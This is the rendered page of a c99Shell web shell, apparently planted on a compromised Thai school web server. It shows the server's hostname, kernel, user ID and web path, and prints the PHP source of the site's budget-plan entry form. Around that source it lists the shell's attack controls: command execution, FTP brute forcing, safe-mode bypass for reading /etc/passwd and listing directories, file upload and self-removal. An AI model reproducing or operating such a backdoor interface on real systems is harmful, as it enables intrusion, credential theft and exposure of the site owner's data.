!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/teacher_aj_viratt/Project&Acc/   drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AddProject.php (11.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
 session_start
();
 if (
session_is_registered("valid_user"))
 {
 
$Username $valid_user;
 
$Password $password;
   include(
"../../Include/FunctionDB.php");
  include(
"../../Include/Function.php"); 
  
//include("header.php");
  
ConnectDB();
?>
<html>
<head>
<title>Add Project </title>
<link rel="stylesheet" href="../../css/style1.css" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<style type="text/css">
<!--
.style6 {font-size: 14px}
.style14 {font-family: Tahoma; font-size: 12px; }
.style15 {color: #003366}
.style16 {font-family: Tahoma; font-size: 12px; color: #003366; }
-->
</style>
</head>

<body bgcolor="#F7F5EC">
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#E0E0E0">
  <tr bgcolor="#ECD9C6">
    <td height="31" colspan="3" bgcolor="#0066CC"><img src="../../Image/Paninglogo.jpg" width="550" height="71"></td>
  </tr>
  <tr bgcolor="#ECD9C6"> 
    <td height="31" colspan="3"> <div align="center"><strong><font color="#000000" size="4" face="Tahoma">เพิ่มข้อมูลตามแผนดำเนินการ </font></strong></div></td>
  </tr>
  <form action="InsertProject1.php" method="post">
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">รหัสหน่วยงาน</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><strong><font color="#003366" size="2" face="Tahoma">
        <select name="Faculty_code" id="Faculty_code" class="input1">
          <?php
           $strSQL3 
"SELECT * FROM  faculty_tb Order By Faculty_code  ASC ";
           
$result3 mysql_query($strSQL3);
                 while( 
$rs3 mysql_fetch_array($result3))     
                     {
                 echo
"<option value=\"$rs3[Faculty_code]\" ><b>$rs3[Faculty_name]</b></option>\n";
                }
                
CloseDB();  
                
          
?>
        </select>
      </font></strong></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">รหัสของแผน</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><input name="Orderlist" type="text" id="Orderlist" size="6"></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#000066" size="2" face="Tahoma">ชื่อหัวข้อแผนดำเนินการ</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><input name="Project_plan" type="text" id="Project_plan" size="60"></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">ข้อแผนดำเนินการ</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><input name="Orderlist_2" type="text" id="Orderlist_2" size="6"></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td width="26%"> <div align="center"><font color="#000066" size="2" face="Tahoma">รายละเอียดของแผนดำเนินการ</font></div></td>
      <td width="1%" bordercolor="#006699">&nbsp;</td>
      <td width="73%" bordercolor="#006699">      <input name="Project_name" type="text" id="Project_name" size="70"></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">หมวดเงิน</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><select name="Percent_ans" id="Percent_ans">
          <option value="<null>">เลือหมวดเงิน</option>
          <option value="งปม">เงินงบประมาณ</option>
          <option value="งบศ">เงินบำรุงการศึกษา</option>
          <option value="งบส">เงินบำรุงสถานบริการ</option>
          <option value="งลท">เงินลงทะเบียน</option>
          <option value="งสบช">เงินบประมาณ สบช</option>
          <option value="งสวส">เงินงบประมาณ สวส</option>
      </select></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td bgcolor="#EEEEEE"><div align="center"><font color="#003366" size="2" face="Tahoma">วันที่เริ่มดำเนินการ</font></div></td>
      <td>&nbsp;</td>
      <td>
        <div align="left">
          <select name="mDate1" id="mDate1" class="select">
            <? getDay1to31();?>
          </select>
          -
          <select name="mMonth1" id="mMonth1" class="input1">
            <? getThaiMonth();?>
          </select>
          -
          <input name="mYear1" type="text" size="5" class="input1">
          <font size="2" face="Tahoma">&nbsp;&nbsp;วันสิ้นสุด
            <select name="mDate2" id="mDate2" class="input1">
              <? getDay1to31();?>
            </select>
          -
          <select name="mMonth2" id="mMonth2" class="input1" >
            <? getThaiMonth();?>
          </select>
          -
          <input name="mYear2" type="text" size="5" class="input1">
      </font></div></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">ปีงบประมาณ พ.ศ.</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><font color="#0000FF" size="2" face="Geneva, Arial, Helvetica, sans-serif">
      <select name="Budget_Year" id="select20">
        <option value="0">ปี งบประมาณ</option>
        <? for($i=2546;$i<=2550;$i++){ 
                                 
$temp=$i;
                                if(
date('Y')==$temp)
                                echo
"<option value='$temp'selected>$temp</option>";
                                   else  echo
"<option value='$temp'>$temp</option>";
                                 }
?>
      </select>
      </font></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">ปีการศึกษา พ.ศ.</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><font color="#0000FF" size="2" face="Geneva, Arial, Helvetica, sans-serif">
      <select name="Term" id="Term">
        <option value="0">ปี พ.ศ</option>
        <? for($i=2546;$i<=2550;$i++){ 
                                 
$temp=$i;
                                if(
date('Y')==$temp)
                                echo
"<option value='$temp'selected>$temp</option>";
                                   else  echo
"<option value='$temp'>$temp</option>";
                                 }
?>
            </select>
      </font></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">กลุ่มเป้าหมาย จำนวน</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><font color="#003366" size="2" face="Tahoma">
          <input name="Period" type="text" id="Period" size="30">
</font></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td height="140"><div align="center"><span class="style6"><font color="#003366" face="Tahoma">งบประมาณแต่ละเดือน</font></span></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><table width="489" border="0" align="center" cellpadding="0" cellspacing="1">
        <tr>
          <th width="99" scope="col"><div align="center" class="style16"> <font size="2" face="Tahoma">มกราคม</font></div></th>
          <th width="121" scope="col"><div align="left" class="style14">
            <input name="January" type="text" id="January" size="6">
          บาท</div></th>
          <th width="110" scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">กรฏาคม</font></div></th>
          <th width="100" scope="col"><div align="left" class="style14">
            <input name="July" type="text" id="July" size="6">
          บาท</div></th>
          <th width="37" scope="col">&nbsp;</th>
          </tr>
        <tr>
          <th scope="col"><div align="center" class="style15"><span class="style14"><font size="2" face="Tahoma">กุมภาพันธ</font></span><font size="2" face="Tahoma">์</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="February" type="text" id="February" size="6"> 
              บาท
          </div></th>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">สิงหาคม</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="Augus" type="text" id="Augus" size="6"> 
              บาท
          </div></th>
          <td>&nbsp;</td>
          </tr>
        <tr>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">มีนาคม</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="March" type="text" id="March" size="6"> 
              บาท
          </div></th>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">กันยายน</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="September" type="text" id="September" size="6"> 
              บาท
          </div></th>
          <td>&nbsp;</td>
          </tr>
        <tr>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">เมษายน</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="April" type="text" id="April" size="6"> 
              บาท
          </div></th>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">ตุลาคม</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="October" type="text" id="October" size="6"> 
              บาท
          </div></th>
          <td>&nbsp;</td>
          </tr>
        <tr>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">พฤษภาคม</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="May" type="text" id="May" size="6"> 
              บาท
          </div></th>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">พฤศจิกายน</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="November" type="text" id="November" size="6"> 
              บาท
          </div></th>
          <td>&nbsp;</td>
          </tr>
        <tr>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">มิถุนายน</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="June" type="text" id="June" size="6"> 
              บาท
          </div></th>
          <th scope="col"><div align="center" class="style15"><font size="2" face="Tahoma">ธันวาคม</font></div></th>
          <th scope="col"><div align="left" class="style14">
              <input name="December" type="text" id="December" size="6"> 
              บาท
          </div></th>
          <td>&nbsp;</td>
          </tr>
      </table></td>
    </tr>
    <tr bgcolor="#ECD9C6"> 
      <td colspan="3"> <div align="center"> 
          <input type="submit" name="Submit3" value="    เพิ่ม    ">
          &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
          <input type="reset" name="Submit22" value="  เริ่มใหม่ ">
        </div></td>
    </tr>
  </form>
</table>
</body>
</html>
<?php 
    
}
else
{
    echo
"<body bgcolor=\"#CCCCCC\">";
     echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";
     echo
"<center>";
      echo
"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
      echo
"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
      echo
"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> คุณไม่มสิทธ์ใช้งาน</font>";
      echo
"</center>";
      echo
"</body>";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0075 ]--